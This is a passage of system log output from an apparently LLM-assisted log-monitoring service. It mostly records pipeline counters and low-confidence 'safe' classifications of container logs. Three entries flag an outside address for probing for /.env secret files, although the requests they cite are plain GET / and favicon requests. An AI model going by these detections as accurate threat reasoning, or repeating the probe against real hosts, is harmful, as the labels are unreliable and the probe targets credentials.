[analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 05:59:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:48.539308 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=contains Mar 20 05:59:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:48.539337 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 05:59:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:54.411019 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 05:59:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 05:59:54.411055 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 06:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:01.940128 [observer] Pipeline: processed=2220 pattern_hits=2177 llm_calls=43 llm_errors=0 learned=0 Mar 20 06:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:01.940178 [observer] Patterns: hash=2177 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=43 Mar 20 06:00:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:05.012810 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 20 06:00:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:05.012849 [analyzer] Confidence 0.78 too low for pattern learning (need 0.85+) Mar 20 06:00:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:11.282388 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 06:00:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:11.282429 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 06:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:31.947473 [observer] Pipeline: processed=2223 pattern_hits=2179 llm_calls=44 
llm_errors=0 learned=0 Mar 20 06:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:00:31.947496 [observer] Patterns: hash=2179 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:01:01.956038 [observer] Pipeline: processed=2227 pattern_hits=2183 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:01:01.956073 [observer] Patterns: hash=2183 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:01:31.935204 [observer] Pipeline: processed=2229 pattern_hits=2185 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:01:31.935223 [observer] Patterns: hash=2185 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:02:01.941210 [observer] Pipeline: processed=2233 pattern_hits=2189 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:02:01.941234 [observer] Patterns: hash=2189 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:02:31.941879 [observer] Pipeline: processed=2235 pattern_hits=2191 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:02:31.941908 [observer] Patterns: hash=2191 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:03:01.965011 [observer] Pipeline: processed=2239 pattern_hits=2195 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:03:01.969320 [observer] Patterns: hash=2195 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:03:31.933877 
[observer] Pipeline: processed=2241 pattern_hits=2197 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:03:31.933901 [observer] Patterns: hash=2197 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:04:01.972581 [observer] Pipeline: processed=2245 pattern_hits=2201 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:04:01.972620 [observer] Patterns: hash=2201 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:04:31.935202 [observer] Pipeline: processed=2249 pattern_hits=2205 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:04:31.935231 [observer] Patterns: hash=2205 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:05:01.944111 [observer] Pipeline: processed=2251 pattern_hits=2207 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:05:01.944138 [observer] Patterns: hash=2207 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:05:31.933906 [observer] Pipeline: processed=2255 pattern_hits=2211 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:05:31.933929 [observer] Patterns: hash=2211 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:06:01.949033 [observer] Pipeline: processed=2257 pattern_hits=2213 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:06:01.949065 [observer] Patterns: hash=2213 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:06:31 
ip-172-26-12-110 observer[1565011]: 2026/03/20 06:06:31.935234 [observer] Pipeline: processed=2261 pattern_hits=2217 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:06:31.935259 [observer] Patterns: hash=2217 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:07:01.940502 [observer] Pipeline: processed=2263 pattern_hits=2219 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:07:01.940526 [observer] Patterns: hash=2219 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:07:31.935103 [observer] Pipeline: processed=2265 pattern_hits=2221 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:07:31.935129 [observer] Patterns: hash=2221 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:08:01.937537 [observer] Pipeline: processed=2269 pattern_hits=2225 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:08:01.937563 [observer] Patterns: hash=2225 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:08:31.933693 [observer] Pipeline: processed=2271 pattern_hits=2227 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:08:31.933721 [observer] Patterns: hash=2227 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:09:01.956770 [observer] Pipeline: processed=2277 pattern_hits=2233 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:09:01.956810 [observer] Patterns: hash=2233 prefix=0 regex=0 
contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:09:31.938837 [observer] Pipeline: processed=2279 pattern_hits=2235 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:09:31.938862 [observer] Patterns: hash=2235 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:10:01.943430 [observer] Pipeline: processed=2283 pattern_hits=2239 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:10:01.944570 [observer] Patterns: hash=2239 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:10:31.941900 [observer] Pipeline: processed=2285 pattern_hits=2241 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:10:31.941933 [observer] Patterns: hash=2241 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:11:01.958507 [observer] Pipeline: processed=2287 pattern_hits=2243 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:11:01.958536 [observer] Patterns: hash=2243 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:11:31.938817 [observer] Pipeline: processed=2291 pattern_hits=2247 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:11:31.938846 [observer] Patterns: hash=2247 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:12:01.973095 [observer] Pipeline: processed=2293 pattern_hits=2249 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 
06:12:01.973128 [observer] Patterns: hash=2249 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:12:31.933859 [observer] Pipeline: processed=2297 pattern_hits=2253 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:12:31.933882 [observer] Patterns: hash=2253 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:13:01.945638 [observer] Pipeline: processed=2299 pattern_hits=2255 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:13:01.945667 [observer] Patterns: hash=2255 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:13:31.934474 [observer] Pipeline: processed=2303 pattern_hits=2259 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:13:31.934497 [observer] Patterns: hash=2259 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:14:01.955976 [observer] Pipeline: processed=2307 pattern_hits=2263 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:14:01.956014 [observer] Patterns: hash=2263 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:14:31.950658 [observer] Pipeline: processed=2309 pattern_hits=2265 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:14:31.950684 [observer] Patterns: hash=2265 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:15:01.944203 [observer] Pipeline: processed=2313 pattern_hits=2269 llm_calls=44 llm_errors=0 learned=0 Mar 
20 06:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:15:01.944242 [observer] Patterns: hash=2269 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:15:31.933905 [observer] Pipeline: processed=2315 pattern_hits=2271 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:15:31.933932 [observer] Patterns: hash=2271 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:16:01.951629 [observer] Pipeline: processed=2319 pattern_hits=2275 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:16:01.951661 [observer] Patterns: hash=2275 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:16:31.933708 [observer] Pipeline: processed=2321 pattern_hits=2277 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:16:31.933767 [observer] Patterns: hash=2277 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:17:01.941792 [observer] Pipeline: processed=2324 pattern_hits=2280 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:17:01.941824 [observer] Patterns: hash=2280 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:17:31.943065 [observer] Pipeline: processed=2327 pattern_hits=2283 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:17:31.943094 [observer] Patterns: hash=2283 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:18:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:18:02.052520 [observer] Pipeline: processed=2329 
pattern_hits=2285 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:18:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:18:02.056796 [observer] Patterns: hash=2285 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:18:31.934944 [observer] Pipeline: processed=2333 pattern_hits=2289 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:18:31.934973 [observer] Patterns: hash=2289 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:19:01.944822 [observer] Pipeline: processed=2337 pattern_hits=2293 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:19:01.944850 [observer] Patterns: hash=2293 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:19:31.935672 [observer] Pipeline: processed=2341 pattern_hits=2297 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:19:31.935696 [observer] Patterns: hash=2297 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:20:01.958475 [observer] Pipeline: processed=2343 pattern_hits=2299 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:20:01.958505 [observer] Patterns: hash=2299 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:20:31.933823 [observer] Pipeline: processed=2346 pattern_hits=2302 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:20:31.933846 [observer] Patterns: hash=2302 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:21:01 ip-172-26-12-110 observer[1565011]: 
2026/03/20 06:21:01.945242 [observer] Pipeline: processed=2349 pattern_hits=2305 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:21:01.945550 [observer] Patterns: hash=2305 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:21:31.951670 [observer] Pipeline: processed=2351 pattern_hits=2307 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:21:31.951704 [observer] Patterns: hash=2307 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:22:01.936394 [observer] Pipeline: processed=2355 pattern_hits=2311 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:22:01.936423 [observer] Patterns: hash=2311 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:22:31.944053 [observer] Pipeline: processed=2357 pattern_hits=2313 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:22:31.944085 [observer] Patterns: hash=2313 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:01.948116 [observer] Pipeline: processed=2361 pattern_hits=2317 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:01.950583 [observer] Patterns: hash=2317 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 misses=44 Mar 20 06:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:31.933729 [observer] Pipeline: processed=2363 pattern_hits=2319 llm_calls=44 llm_errors=0 learned=0 Mar 20 06:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:31.933755 [observer] Patterns: hash=2319 prefix=0 regex=0 contains=0 deny=6 alert=8 suppress=0 
misses=44 Mar 20 06:23:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:52.700228 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T06:23:52.699986007Z 159.89.235.121 - - [20/Mar/2026:06:23:52 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 302 138 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefo... Mar 20 06:23:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:52.868967 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T06:23:52.868687960Z 159.89.235.121 - - [20/Mar/2026:06:23:52 +0000] "media.admin.kovicloud.com" "GET /favicon.ico HTTP/1.1" 302 138 "http://media.admin.kovicloud.com/" "Mozilla/5.0 (X11; Li... Mar 20 06:23:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:23:53.211435 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T06:23:53.211156241Z 159.89.235.121 - - [20/Mar/2026:06:23:53 +0000] "media.admin.kovicloud.com" "GET / HTTP/1.1" 200 1309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, lik... 
Mar 20 06:24:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:00.850967 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 06:24:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:00.851019 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 06:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:01.950350 [observer] Pipeline: processed=2372 pattern_hits=2327 llm_calls=45 llm_errors=0 learned=0 Mar 20 06:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:01.950376 [observer] Patterns: hash=2327 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=45 Mar 20 06:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:31.933852 [observer] Pipeline: processed=2375 pattern_hits=2330 llm_calls=45 llm_errors=0 learned=0 Mar 20 06:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:24:31.933876 [observer] Patterns: hash=2330 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=45 Mar 20 06:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:01.949400 [observer] Pipeline: processed=2378 pattern_hits=2332 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:01.954439 [observer] Patterns: hash=2332 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:25:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:06.603761 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.83 action=allow pattern_type=prefix Mar 20 06:25:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:06.603803 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 06:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:31.938794 [observer] Pipeline: processed=2382 pattern_hits=2336 llm_calls=46 llm_errors=0 
learned=0 Mar 20 06:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:25:31.938827 [observer] Patterns: hash=2336 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:26:01.995015 [observer] Pipeline: processed=2384 pattern_hits=2338 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:26:01.995045 [observer] Patterns: hash=2338 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:26:31.934828 [observer] Pipeline: processed=2388 pattern_hits=2342 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:26:31.934855 [observer] Patterns: hash=2342 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:27:01.980422 [observer] Pipeline: processed=2390 pattern_hits=2344 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:27:01.980459 [observer] Patterns: hash=2344 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:27:31.936275 [observer] Pipeline: processed=2393 pattern_hits=2347 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:27:31.936307 [observer] Patterns: hash=2347 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:28:01.966316 [observer] Pipeline: processed=2396 pattern_hits=2350 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:28:01.966352 [observer] Patterns: hash=2350 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:28:31.950674 [observer] 
Pipeline: processed=2398 pattern_hits=2352 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:28:31.950699 [observer] Patterns: hash=2352 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:29:01.942599 [observer] Pipeline: processed=2404 pattern_hits=2358 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:29:01.942630 [observer] Patterns: hash=2358 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:29:31.944784 [observer] Pipeline: processed=2406 pattern_hits=2360 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:29:31.944811 [observer] Patterns: hash=2360 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:30:01.936566 [observer] Pipeline: processed=2410 pattern_hits=2364 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:30:01.936592 [observer] Patterns: hash=2364 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:30:31.933747 [observer] Pipeline: processed=2412 pattern_hits=2366 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:30:31.933772 [observer] Patterns: hash=2366 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:31:01.945739 [observer] Pipeline: processed=2415 pattern_hits=2369 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:31:01.945771 [observer] Patterns: hash=2369 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:31:31 
ip-172-26-12-110 observer[1565011]: 2026/03/20 06:31:31.933969 [observer] Pipeline: processed=2418 pattern_hits=2372 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:31:31.933992 [observer] Patterns: hash=2372 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:32:01.968108 [observer] Pipeline: processed=2420 pattern_hits=2374 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:32:01.968138 [observer] Patterns: hash=2374 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:32:31.936140 [observer] Pipeline: processed=2424 pattern_hits=2378 llm_calls=46 llm_errors=0 learned=0 Mar 20 06:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:32:31.936199 [observer] Patterns: hash=2378 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46 Mar 20 06:33:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:33:02.002425 [observer] Pipeline: processed=2426 pattern_hits=2380 llm_calls=46 llm_errors=0 learned=0 Mar 20 